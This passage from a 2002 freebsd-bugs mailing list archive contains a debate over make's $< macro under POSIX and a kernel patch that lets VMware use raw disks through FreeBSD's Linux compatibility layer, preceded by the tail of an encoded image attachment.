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 --MCcc3x781F3J4554c-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 7:10:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 032A337B41A for ; Thu, 18 Apr 2002 07:10:04 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3IEA3r22544; Thu, 18 Apr 2002 07:10:03 -0700 (PDT) (envelope-from gnats) Date: Thu, 18 Apr 2002 07:10:03 -0700 (PDT) Message-Id: <200204181410.g3IEA3r22544@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ruslan Ermilov Subject: Re: bin/37224: make: $< only set for implicit rules Reply-To: Ruslan Ermilov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/37224; it has been noted by GNATS. From: Ruslan Ermilov To: Gerald Pfeifer Cc: bug-followup@FreeBSD.org Subject: Re: bin/37224: make: $< only set for implicit rules Date: Thu, 18 Apr 2002 17:06:57 +0300 --5Mfx4RzfBqgnTE/w Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Thu, Apr 18, 2002 at 01:23:18PM +0200, Gerald Pfeifer wrote: >=20 > .c.o: > echo $< >=20 > foo: bar.c > echo $< >=20 >=20 > Specifically, 'make bar.o' prints bar.c, as expected, while 'make foo' > prints the empty string (as $< has not been set). >=20 > GNU make prints bar.c in both cases, and also my reading of > IEEE Std 1003.1-2001 indicates that make(1) is incorrect here. >=20 No, POSIX.1-2001 requests the $< to be defined in the "inference" rules, i.e., .c.o type of rules. For "target" rules, like "foo: bar.c" above, it should be undefined: : $< In an inference rule, the $< macro shall evaluate to the : filename whose existence allowed the inference rule to be : chosen for the target. In the .DEFAULT rule, the $< macro : shall evaluate to the current target name. The meaning of : the $< macro shall be otherwise unspecified. For example, ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ : in the .c.a inference rule, $< represents the prerequisite : .c file. I think this PR can be closed. Cheers, --=20 Ruslan Ermilov Sysadmin and DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age --5Mfx4RzfBqgnTE/w Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE8vtMAUkv4P6juNwoRAqktAJ0Y8nYdeNRKTS5ZfIYEZWv+CHnYxQCfcciF A1dm7hv4NeNFR39gQEUN/wU= =Cy4T -----END PGP SIGNATURE----- --5Mfx4RzfBqgnTE/w-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 7:20:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DCE6E37B400 for ; Thu, 18 Apr 2002 07:20:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3IEK3424118; Thu, 18 Apr 2002 07:20:03 -0700 (PDT) (envelope-from gnats) Date: Thu, 18 Apr 2002 07:20:03 -0700 (PDT) Message-Id: <200204181420.g3IEK3424118@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Gerald Pfeifer Subject: Re: bin/37224: make: $< only set for implicit rules Reply-To: Gerald Pfeifer Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/37224; it has been noted by GNATS. From: Gerald Pfeifer To: Ruslan Ermilov Cc: bug-followup@freebsd.org Subject: Re: bin/37224: make: $< only set for implicit rules Date: Thu, 18 Apr 2002 16:19:39 +0200 (CEST) On Thu, 18 Apr 2002, Ruslan Ermilov wrote: >> GNU make prints bar.c in both cases, and also my reading of >> IEEE Std 1003.1-2001 indicates that make(1) is incorrect here. > No, POSIX.1-2001 requests the $< to be defined in the "inference" rules, > i.e., .c.o type of rules. For "target" rules, like "foo: bar.c" above, > it should be undefined: > : $< In an inference rule, the $< macro shall evaluate to the > : filename whose existence allowed the inference rule to be > : chosen for the target. In the .DEFAULT rule, the $< macro > : shall evaluate to the current target name. The meaning of > : the $< macro shall be otherwise unspecified. For example, > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > : in the .c.a inference rule, $< represents the prerequisite > : .c file. This was my first thinking as well, but then I got apparently confused by the standard. :-( > I think this PR can be closed. If this isn't a bug in the implementation, the man page for make(1) should be updated. The following certainly is not sufficient: .IMPSRC The name/path of the source from which the target is to be transformed (the ``implied'' source); also known as `<'. The current man page even does not contain the string "inference" at all, and the above is the only reference to "implied" as well. In other words, even if the implementation is correct, there is certainly a lack of documentation, so instead of closing the PR it ought to be moved from bin to doc in this case. Gerald -- Gerald "Jerry" pfeifer@dbai.tuwien.ac.at http://www.dbai.tuwien.ac.at/~pfeifer/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Apr 18 8:10:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3379937B416 for ; Thu, 18 Apr 2002 08:10:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g3IFA2r36042; Thu, 18 Apr 2002 08:10:02 -0700 (PDT) (envelope-from gnats) Received: from vbook.express.ru (asplinux.ru [195.133.213.194]) by hub.freebsd.org (Postfix) with ESMTP id 4601237B41B for ; Thu, 18 Apr 2002 08:08:24 -0700 (PDT) Received: from vova by vbook.express.ru with local (Exim 3.35 #1) id 16yDWF-0000cK-00; Thu, 18 Apr 2002 19:08:19 +0400 Message-Id: Date: Thu, 18 Apr 2002 19:08:19 +0400 From: "Vladimir B.Grebenschikov" Reply-To: "Vladimir B.Grebenschikov" To: FreeBSD-gnats-submit@FreeBSD.org Cc: vsilyaev@mindspring.com X-Send-Pr-Version: 3.113 Subject: kern/37227: VMWare do not work with raw disks due to invalid device hadling by linuxlator Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 37227 >Category: kern >Synopsis: VMWare do not work with raw disks due to invalid device hadling by linuxlator >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Apr 18 08:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Vladimir B. Grebenschikov >Release: FreeBSD 5.0-CURRENT i386 >Organization: SWsoft >Environment: System: FreeBSD vbook.express.ru 5.0-CURRENT FreeBSD 5.0-CURRENT #16: Tue Apr 9 12:13:44 MSD 2002 vova@vbook.express.ru:/usr/local/src/sys/i386/compile/VBOOK i386 -CURRENT kernel about Tue Apr 9 12:13:44 MSD /usr/ports/emulators/vmware2 port >Description: When vmware tries to work with disk in "raw" mode it does some strange magics actions to determine type of disk and in case of character device (nowdays in FreeBSD) it failed to determine disk type validly. >How-To-Repeat: install /usr/ports/emulators/vmware2 port and try to use "raw" disk in vmware, it will detect partitions right, but filed to start VirtualMachine >Fix: I found exactly same hack (BSD characted devices substituted to block device for linux binaries) in newstat_copyout() and assume that this hack will help in stat64_copyout() for vmware2 - it really helps. Index: linux_stats.c =================================================================== RCS file: /home/ncvs/src/sys/compat/linux/linux_stats.c,v retrieving revision 1.40 diff -u -r1.40 linux_stats.c --- linux_stats.c 2002/01/14 00:13:42 1.40 +++ linux_stats.c 2002/04/18 15:00:43 @@ -362,6 +362,8 @@ stat64_copyout(struct stat *buf, void *ubuf) { struct l_stat64 lbuf; + struct cdevsw *cdevsw; + dev_t dev; bzero(&lbuf, sizeof(lbuf)); lbuf.st_dev = uminor(buf->st_dev) | (umajor(buf->st_dev) << 8); @@ -377,6 +379,25 @@ lbuf.st_ctime = buf->st_ctime; lbuf.st_blksize = buf->st_blksize; lbuf.st_blocks = buf->st_blocks; + + + /* Lie about disk drives which are character devices + * in FreeBSD but block devices under Linux. + */ + if (S_ISCHR(lbuf.st_mode) && + (dev = udev2dev(buf->st_rdev, 0)) != NODEV) { + cdevsw = devsw(dev); + if (cdevsw != NULL && (cdevsw->d_flags & D_DISK)) { + lbuf.st_mode &= ~S_IFMT; + lbuf.st_mode |= S_IFBLK; + + /* XXX this may not be quite right */ + /* Map major number to 0 */ + lbuf.st_dev = uminor(buf->st_dev) & 0xf; + lbuf.st_rdev = buf->st_rdev & 0xff; + } + } + /* * The __st_ino field makes all the difference. In the Linux kernel >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org 